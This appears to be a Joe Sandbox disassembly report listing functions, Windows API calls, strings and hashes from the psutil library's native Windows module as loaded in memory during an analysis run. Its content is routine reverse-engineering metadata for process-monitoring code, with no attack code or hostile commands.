_Py_Dealloc.PYTHON3 ref: 00007FFB9DD66269
_Py_Dealloc.PYTHON3 ref: 00007FFB9DD66278
CloseHandle.KERNEL32 ref: 00007FFB9DD66281

Memory Dump Source

Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true

Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd

Similarity

API ID: Dealloc$From$CloseDict_HandleLongLong_Process32$CreateErr_FirstItemNextSnapshotToolhelp32Windowsmemset
String ID:
API String ID: 1629090121-0
Opcode ID: 078a453b94b3af55ca3becf16c7fa20fc013800b24ea59984ca65c7d3f2a397a
Instruction ID: 96a09a6fa24b032ca1fb3e9db52517f91a20b76781312c2af55de74210143ad7
Opcode Fuzzy Hash: 078a453b94b3af55ca3becf16c7fa20fc013800b24ea59984ca65c7d3f2a397a
Instruction Fuzzy Hash: A7519572B0DA8286E7369F36E81427D3BA0AF8EBA0F895071CACD46655FE2CD445C741

Function 00007FFB9DD66290 Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 82memorynativeCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00007FFB9DD662B4
HeapAlloc.KERNEL32 ref: 00007FFB9DD662C5
GetFileType.KERNEL32 ref: 00007FFB9DD662DE
SetLastError.KERNEL32 ref: 00007FFB9DD662EB
NtQueryObject.NTDLL ref: 00007FFB9DD6632A
GetProcessHeap.KERNEL32 ref: 00007FFB9DD66347
HeapFree.KERNEL32 ref: 00007FFB9DD66359
GetProcessHeap.KERNEL32 ref: 00007FFB9DD66363
HeapAlloc.KERNEL32 ref: 00007FFB9DD66374
PyErr_NoMemory.PYTHON3 ref: 00007FFB9DD663A3
GetProcessHeap.KERNEL32 ref: 00007FFB9DD663B3
HeapFree.KERNEL32 ref: 00007FFB9DD663C5

Strings

NtQuerySystemInformation, xrefs: 00007FFB9DD66393

Memory Dump Source

Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true

Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd

Similarity

API ID: Heap$Process$AllocFree$Err_ErrorFileLastMemoryObjectQueryType
String ID: NtQuerySystemInformation
API String ID: 448133315-2549949336
Opcode ID: 173ed2a84f7f2092116857aa56532c888c5385018bd866124a014456846aa5aa
Instruction ID: 58891cc20aa93791fd9ae4a6bda6806bce98b99173cca267fe53eb7770f16fd5
Opcode Fuzzy Hash: 173ed2a84f7f2092116857aa56532c888c5385018bd866124a014456846aa5aa
Instruction Fuzzy Hash: 04311DA1B08F0686EB249B77E44823967A1BF4DB80F952475D99E837A1FF7DE4048780

Function 00007FFB9DD64D40 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 66nativeCOMMON

Download Yara Rule

APIs

PyArg_ParseTuple.PYTHON3 ref: 00007FFB9DD64D5E
OpenProcess.KERNEL32 ref: 00007FFB9DD64D88
GetLastError.KERNEL32 ref: 00007FFB9DD64D96
PyObject_IsTrue.PYTHON3 ref: 00007FFB9DD64DD1
NtSuspendProcess.NTDLL ref: 00007FFB9DD64DDE
CloseHandle.KERNEL32 ref: 00007FFB9DD64DF1

Part of subcall function 00007FFB9DD61180: PyObject_CallFunction.PYTHON3 ref: 00007FFB9DD611CB
Part of subcall function 00007FFB9DD61180: PyErr_SetObject.PYTHON3 ref: 00007FFB9DD611E1
Part of subcall function 00007FFB9DD61180: _Py_Dealloc.PYTHON3 ref: 00007FFB9DD611F5

NtResumeProcess.NTDLL ref: 00007FFB9DD64DE6

Strings

automatically set for PID 0, xrefs: 00007FFB9DD64D70
NtSuspend|ResumeProcess, xrefs: 00007FFB9DD64DFB
OpenProcess, xrefs: 00007FFB9DD64DA1

Memory Dump Source

Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true

Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd

Similarity

API ID: Process$Object_$Arg_CallCloseDeallocErr_ErrorFunctionHandleLastObjectOpenParseResumeSuspendTrueTuple
String ID: NtSuspend|ResumeProcess$OpenProcess$automatically set for PID 0
API String ID: 3554915889-3759402225
Opcode ID: 7fe35ee0cee9196c9350aa1929796caaec3d297f6f1b8f1f090c40a2d7c9568f
Instruction ID: 1ec5bb6286e75138111ea85eac19ab25bf4773e6effa7fc74ffcb3c548669f43
Opcode Fuzzy Hash: 7fe35ee0cee9196c9350aa1929796caaec3d297f6f1b8f1f090c40a2d7c9568f
Instruction Fuzzy Hash: ED2153A1F1C90681EB749B77E4401792361EF8CB84FC46035DA9D437A5FF2DE4458780

Function 00007FFB9DD67480 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 69nativeCOMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFB9DD65C74), ref: 00007FFB9DD674A9
NtQuerySystemInformation.NTDLL ref: 00007FFB9DD674D2
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFB9DD65C74), ref: 00007FFB9DD674E9
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFB9DD65C74), ref: 00007FFB9DD674F3
PyErr_NoMemory.PYTHON3(?,?,?,00007FFB9DD65C74), ref: 00007FFB9DD67501
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFB9DD65C74), ref: 00007FFB9DD67534
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFB9DD67578

Strings

NtQuerySystemInformation (no PID found), xrefs: 00007FFB9DD67569
NtQuerySystemInformation(SystemProcessInformation), xrefs: 00007FFB9DD67523

Memory Dump Source

Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true

Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd

Similarity

API ID: free$malloc$Err_InformationMemoryQuerySystem
String ID: NtQuerySystemInformation (no PID found)$NtQuerySystemInformation(SystemProcessInformation)
API String ID: 2506067127-1914444273
Opcode ID: c1f39219ef529a7d1b02474b8a8397f5895c2532aa83dbe5a712c8285f180f06
Instruction ID: e5105b33b7fc36eb08f7740b462fe299974cf54ee8876f578a18718285847597
Opcode Fuzzy Hash: c1f39219ef529a7d1b02474b8a8397f5895c2532aa83dbe5a712c8285f180f06
Instruction Fuzzy Hash: B73177B5B0DA4682EB249B36E45413967A0FF4CB84F942434DA8E83BA4FF3DE4418780

Function 00007FFB9DD65760 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 63nativeCOMMON

Download Yara Rule

APIs

PyArg_ParseTuple.PYTHON3 ref: 00007FFB9DD65779
OpenProcess.KERNEL32 ref: 00007FFB9DD657A3
GetLastError.KERNEL32 ref: 00007FFB9DD657B1
NtQueryInformationProcess.NTDLL ref: 00007FFB9DD65802
CloseHandle.KERNEL32 ref: 00007FFB9DD6580D

Part of subcall function 00007FFB9DD61180: PyObject_CallFunction.PYTHON3 ref: 00007FFB9DD611CB
Part of subcall function 00007FFB9DD61180: PyErr_SetObject.PYTHON3 ref: 00007FFB9DD611E1
Part of subcall function 00007FFB9DD61180: _Py_Dealloc.PYTHON3 ref: 00007FFB9DD611F5

Py_BuildValue.PYTHON3 ref: 00007FFB9DD6583B

Strings

automatically set for PID 0, xrefs: 00007FFB9DD6578B
NtQueryInformationProcess, xrefs: 00007FFB9DD65817
OpenProcess, xrefs: 00007FFB9DD657BC

Memory Dump Source

Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true

Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd

Similarity

API ID: Process$Arg_BuildCallCloseDeallocErr_ErrorFunctionHandleInformationLastObjectObject_OpenParseQueryTupleValue
String ID: NtQueryInformationProcess$OpenProcess$automatically set for PID 0
API String ID: 2930197940-1336995763
Opcode ID: 6001fec04dc8f923077f7470f88e55ada98714560efaf6b8697b7bc6922b23ba
Instruction ID: 8f53f2943e44283f1b49e7d5e1d830f5969b356cff59a0feaa2f0500a33be4c6
Opcode Fuzzy Hash: 6001fec04dc8f923077f7470f88e55ada98714560efaf6b8697b7bc6922b23ba
Instruction Fuzzy Hash: D521A4A1B0CA4282FB20DB33F44427963A1EF9C794FD46135DA8D476A5FE3CE4898780

Function 00007FFB9DD62A30 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 51threadCOMMON

Download Yara Rule

APIs

PyArg_ParseTuple.PYTHON3 ref: 00007FFB9DD62A45
PyUnicode_AsWideCharString.PYTHON3 ref: 00007FFB9DD62A5A
PyEval_SaveThread.PYTHON3 ref: 00007FFB9DD62A76
GetDiskFreeSpaceExW.KERNEL32 ref: 00007FFB9DD62A91
PyEval_RestoreThread.PYTHON3 ref: 00007FFB9DD62A9C
PyMem_Free.PYTHON3 ref: 00007FFB9DD62AA5
PyErr_SetExcFromWindowsErrWithFilenameObject.PYTHON3 ref: 00007FFB9DD62ACA
Py_BuildValue.PYTHON3 ref: 00007FFB9DD62AE7

Strings

(LL), xrefs: 00007FFB9DD62ADB

Memory Dump Source

Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true

Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd

Similarity

API ID: Eval_FreeThread$Arg_BuildCharDiskErr_FilenameFromMem_ObjectParseRestoreSaveSpaceStringTupleUnicode_ValueWideWindowsWith
String ID: (LL)
API String ID: 4101313974-591180812
Opcode ID: b068e9dae5a6de77f38790b3924a703566198fee7ed684031e271233b0b90aa3
Instruction ID: 8c7dd090cf8edd5232b0a96f357a0b1e43777a92b0d1c4ddfffa59ae3a1aa574
Opcode Fuzzy Hash: b068e9dae5a6de77f38790b3924a703566198fee7ed684031e271233b0b90aa3
Instruction Fuzzy Hash: 1B113365B08E8681EB209B77F4440A9A760FF9DB94B891032D98D43724EE7CD545C780

Function 00007FFB9DD65850 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 63nativeCOMMON

Download Yara Rule

APIs

PyArg_ParseTuple.PYTHON3 ref: 00007FFB9DD6586E
OpenProcess.KERNEL32 ref: 00007FFB9DD65898
GetLastError.KERNEL32 ref: 00007FFB9DD658A6
NtSetInformationProcess.NTDLL ref: 00007FFB9DD658EE
CloseHandle.KERNEL32 ref: 00007FFB9DD658F9

Part of subcall function 00007FFB9DD61180: PyObject_CallFunction.PYTHON3 ref: 00007FFB9DD611CB
Part of subcall function 00007FFB9DD61180: PyErr_SetObject.PYTHON3 ref: 00007FFB9DD611E1
Part of subcall function 00007FFB9DD61180: _Py_Dealloc.PYTHON3 ref: 00007FFB9DD611F5

Strings

automatically set for PID 0, xrefs: 00007FFB9DD65880
NtSetInformationProcess, xrefs: 00007FFB9DD65903
OpenProcess, xrefs: 00007FFB9DD658B1

Memory Dump Source

Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true

Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd

Similarity

API ID: Process$Arg_CallCloseDeallocErr_ErrorFunctionHandleInformationLastObjectObject_OpenParseTuple
String ID: NtSetInformationProcess$OpenProcess$automatically set for PID 0
API String ID: 2437414965-2953277767
Opcode ID: 55e2a84ace86b59902f4081047c486fe4386992492a4237446058aee31be4aed
Instruction ID: 54507703c1c18744700e1d78551fcb31ec77a6a1b6049cc5b784666ebc087cdc
Opcode Fuzzy Hash: 55e2a84ace86b59902f4081047c486fe4386992492a4237446058aee31be4aed
Instruction Fuzzy Hash: 962174A1B1DA4291FB249B77E4841792361EF9C780FC46035DA9D43765FF2CE48487C0

Function 00007FFB9DD6A9E8 Relevance: 13.6, APIs: 9, Instructions: 72COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 00007FFB9DD6AA04
memset.VCRUNTIME140 ref: 00007FFB9DD6AA28
RtlCaptureContext.KERNEL32 ref: 00007FFB9DD6AA31
RtlLookupFunctionEntry.KERNEL32 ref: 00007FFB9DD6AA4B
RtlVirtualUnwind.KERNEL32 ref: 00007FFB9DD6AA8C
memset.VCRUNTIME140 ref: 00007FFB9DD6AABF
IsDebuggerPresent.KERNEL32 ref: 00007FFB9DD6AAE0
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FFB9DD6AB01
UnhandledExceptionFilter.KERNEL32 ref: 00007FFB9DD6AB0C

Memory Dump Source

Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true

Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandledmemset$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 313767242-0
Opcode ID: b8a3f4a000f899b476dfa274a2e1eb7cf38e98b0b77c6146e29622830b712c9c
Instruction ID: b78e47b2820ff5c0d11c96f1cda920f526b2c91d332a6d6e2a08f723845e4426
Opcode Fuzzy Hash: b8a3f4a000f899b476dfa274a2e1eb7cf38e98b0b77c6146e29622830b712c9c
Instruction Fuzzy Hash: E33150B2709A818AEB709F71E8407ED73A0FF88744F84503ADA8D57A94EF38D548C740

Function 00007FFB9DD68B10 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40serviceCOMMON

Download Yara Rule

APIs

PyArg_ParseTuple.PYTHON3 ref: 00007FFB9DD68B23
StartServiceA.ADVAPI32 ref: 00007FFB9DD68B5E
CloseServiceHandle.ADVAPI32 ref: 00007FFB9DD68B77

Strings

StartService, xrefs: 00007FFB9DD68B68

Memory Dump Source

Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true

Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd

Similarity

API ID: Service$Arg_CloseHandleParseStartTuple
String ID: StartService
API String ID: 2343249381-99420325
Opcode ID: bd06afd057e7d5728987b8bacab01cf6a86a3d34312b0c3eb040550a7b2aa7c7
Instruction ID: b0a631d0eab76786d3500a62c316dff549bd53d002b5e63ed828e63f68d71205
Opcode Fuzzy Hash: bd06afd057e7d5728987b8bacab01cf6a86a3d34312b0c3eb040550a7b2aa7c7
Instruction Fuzzy Hash: 5E01EDA4B49A4681EB349B37E85017523A0BF8DB84FC82035DA8D42755FE3DE5458780

Function 00007FFB9DD651A0 Relevance: 82.5, APIs: 40, Strings: 7, Instructions: 245
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PyArg_ParseTuple.PYTHON3 ref: 00007FFB9DD651F0
OpenProcess.KERNEL32 ref: 00007FFB9DD6522B
GetLastError.KERNEL32 ref: 00007FFB9DD65239
OpenProcessToken.ADVAPI32 ref: 00007FFB9DD6527A
GetLastError.KERNEL32 ref: 00007FFB9DD65284

Part of subcall function 00007FFB9DD61010: __stdio_common_vsprintf.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FFB9DD6105B

PyErr_SetFromWindowsErrWithFilename.PYTHON3 ref: 00007FFB9DD652AB
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFB9DD652B7
GetTokenInformation.ADVAPI32 ref: 00007FFB9DD652EC
GetLastError.KERNEL32 ref: 00007FFB9DD652F6
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFB9DD65304
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFB9DD6530E
PyErr_NoMemory.PYTHON3 ref: 00007FFB9DD6531C
CloseHandle.KERNEL32 ref: 00007FFB9DD65325
CloseHandle.KERNEL32 ref: 00007FFB9DD65335
CloseHandle.KERNEL32 ref: 00007FFB9DD65353
CloseHandle.KERNEL32 ref: 00007FFB9DD6535E
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFB9DD65378
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFB9DD65397
LookupAccountSidW.ADVAPI32 ref: 00007FFB9DD653CF
GetLastError.KERNEL32 ref: 00007FFB9DD653DD
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFB9DD653EF
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFB9DD653F8
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFB9DD65405
PyErr_NoMemory.PYTHON3 ref: 00007FFB9DD65417
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFB9DD65425
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFB9DD6542E
_Py_Dealloc.PYTHON3 ref: 00007FFB9DD65442
_Py_Dealloc.PYTHON3 ref: 00007FFB9DD65456
_Py_Dealloc.PYTHON3 ref: 00007FFB9DD6546B
GetLastError.KERNEL32 ref: 00007FFB9DD654A3
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFB9DD6558C

Part of subcall function 00007FFB9DD61180: PyObject_CallFunction.PYTHON3 ref: 00007FFB9DD611CB
Part of subcall function 00007FFB9DD61180: PyErr_SetObject.PYTHON3 ref: 00007FFB9DD611E1
Part of subcall function 00007FFB9DD61180: _Py_Dealloc.PYTHON3 ref: 00007FFB9DD611F5

PyUnicode_FromWideChar.PYTHON3 ref: 00007FFB9DD654ED
PyUnicode_FromWideChar.PYTHON3 ref: 00007FFB9DD65510
Py_BuildValue.PYTHON3 ref: 00007FFB9DD6552B
_Py_Dealloc.PYTHON3 ref: 00007FFB9DD65542
_Py_Dealloc.PYTHON3 ref: 00007FFB9DD65551
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFB9DD6555A
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFB9DD65563
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFB9DD6556C
PyErr_NoMemory.PYTHON3 ref: 00007FFB9DD6557A

Strings

automatically set for PID 0, xrefs: 00007FFB9DD65213
OpenProcess, xrefs: 00007FFB9DD65244
GetTokenInformation, xrefs: 00007FFB9DD65342
OpenProcessToken, xrefs: 00007FFB9DD6528A
(originated from %s), xrefs: 00007FFB9DD65293
LookupAccountSidW, xrefs: 00007FFB9DD654C1
LookupAccountSidW -> ERROR_NONE_MAPPED, xrefs: 00007FFB9DD654B0

Memory Dump Source

Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true

Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd

Similarity

API ID: free$Dealloc$Err_ErrorLastmalloc$CloseHandle$FromMemory$CharOpenProcessTokenUnicode_Wide$AccountArg_BuildCallFilenameFunctionInformationLookupObjectObject_ParseTupleValueWindowsWith__stdio_common_vsprintf
String ID: (originated from %s)$GetTokenInformation$LookupAccountSidW$LookupAccountSidW -> ERROR_NONE_MAPPED$OpenProcess$OpenProcessToken$automatically set for PID 0
API String ID: 3415421272-2228157761
Opcode ID: 68b8963b0c6dded1526c4caa053f450d9b3446f0071a4d5c04e78b6400ab28a4
Instruction ID: 0a91099decd0945fdf006c4fad1cec2ded3c36e07e34cbaa45888b744a41d458
Opcode Fuzzy Hash: 68b8963b0c6dded1526c4caa053f450d9b3446f0071a4d5c04e78b6400ab28a4
Instruction Fuzzy Hash: 4AB12CA1B0DA4286EA349B73E81827963A0FF5DB91FC56435D9CE427A4FE3CE4458780

Function 00007FFB9DD67A40 Relevance: 61.4, APIs: 25, Strings: 10, Instructions: 141
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLastError.KERNEL32(?,?,?,00007FFB9DD64116), ref: 00007FFB9DD67A5D
GetLastError.KERNEL32(?,?,?,00007FFB9DD64116), ref: 00007FFB9DD67A81
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,00007FFB9DD64116), ref: 00007FFB9DD67AA7
fprintf.MSPDB140-MSVCRT ref: 00007FFB9DD67AC4
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,00007FFB9DD64116), ref: 00007FFB9DD67ACE
fprintf.MSPDB140-MSVCRT ref: 00007FFB9DD67ADE
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,00007FFB9DD64116), ref: 00007FFB9DD67AE8
fprintf.MSPDB140-MSVCRT ref: 00007FFB9DD67AF8

Part of subcall function 00007FFB9DD610E0: PyObject_CallFunction.PYTHON3 ref: 00007FFB9DD6112B
Part of subcall function 00007FFB9DD610E0: PyErr_SetObject.PYTHON3 ref: 00007FFB9DD61141
Part of subcall function 00007FFB9DD610E0: _Py_Dealloc.PYTHON3 ref: 00007FFB9DD61155

GetExitCodeProcess.KERNEL32 ref: 00007FFB9DD67BB1
CloseHandle.KERNEL32 ref: 00007FFB9DD67BDC

Strings

OpenProcess -> ERROR_INVALID_PARAMETER, xrefs: 00007FFB9DD67A68
psutil-debug [%s:%d]> , xrefs: 00007FFB9DD67ABD, 00007FFB9DD67B3A, 00007FFB9DD67C28
psutil/arch/windows\proc_utils.c, xrefs: 00007FFB9DD67AB3, 00007FFB9DD67B30, 00007FFB9DD67C1E
OpenProcess -> ERROR_SUCCESS, xrefs: 00007FFB9DD67AFD, 00007FFB9DD67B7A
GetExitCodeProcess -> ERROR_ACCESS_DENIED (ignored), xrefs: 00007FFB9DD67C42
OpenProcess, xrefs: 00007FFB9DD67B93
OpenProcess -> ERROR_SUCCESS turned into NSP, xrefs: 00007FFB9DD67B54
OpenProcess -> ERROR_SUCCESS turned into AD, xrefs: 00007FFB9DD67AD7
GetExitCodeProcess, xrefs: 00007FFB9DD67C7E
GetExitCodeProcess != STILL_ACTIVE, xrefs: 00007FFB9DD67BE2

Memory Dump Source

Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true

Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd

Similarity

API ID: __acrt_iob_funcfprintf$ErrorLast$CallCloseCodeDeallocErr_ExitFunctionHandleObjectObject_Process
String ID: GetExitCodeProcess$GetExitCodeProcess != STILL_ACTIVE$GetExitCodeProcess -> ERROR_ACCESS_DENIED (ignored)$OpenProcess$OpenProcess -> ERROR_INVALID_PARAMETER$OpenProcess -> ERROR_SUCCESS$OpenProcess -> ERROR_SUCCESS turned into AD$OpenProcess -> ERROR_SUCCESS turned into NSP$psutil-debug [%s:%d]> $psutil/arch/windows\proc_utils.c
API String ID: 2708412498-404906942
Opcode ID: 6ab42e8da564327604033457bdb72f0ef09061680685dd6206d40f04dffea4ba
Instruction ID: eeb83b8f565fd04d70060d3d1e065d69fb17d8bd42a6f357664f826d0cc215a9
Opcode Fuzzy Hash: 6ab42e8da564327604033457bdb72f0ef09061680685dd6206d40f04dffea4ba
Instruction Fuzzy Hash: FB514FA1F1C90291EB749B3BE8552B92260AF8CB80FC52137D58D462B5FE2DE985C7C0

Function 00007FFB9DD663F0 Relevance: 61.4, APIs: 24, Strings: 11, Instructions: 124
threadsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNEL32 ref: 00007FFB9DD6642B
GetLastError.KERNEL32 ref: 00007FFB9DD66439

Part of subcall function 00007FFB9DD61010: __stdio_common_vsprintf.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FFB9DD6105B

PyErr_SetFromWindowsErrWithFilename.PYTHON3 ref: 00007FFB9DD66460
WaitForSingleObject.KERNEL32 ref: 00007FFB9DD66478
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FFB9DD66497
fprintf.MSPDB140-MSVCRT ref: 00007FFB9DD664B4
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FFB9DD664BE
fprintf.MSPDB140-MSVCRT ref: 00007FFB9DD664D4
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FFB9DD664DE
fprintf.MSPDB140-MSVCRT ref: 00007FFB9DD664EE
TerminateThread.KERNEL32 ref: 00007FFB9DD664F8
CloseHandle.KERNEL32 ref: 00007FFB9DD66511

Strings

psutil-debug [%s:%d]> , xrefs: 00007FFB9DD664AD, 00007FFB9DD6655E
GetExitCodeThread (failed) -> TerminateThread, xrefs: 00007FFB9DD665E6
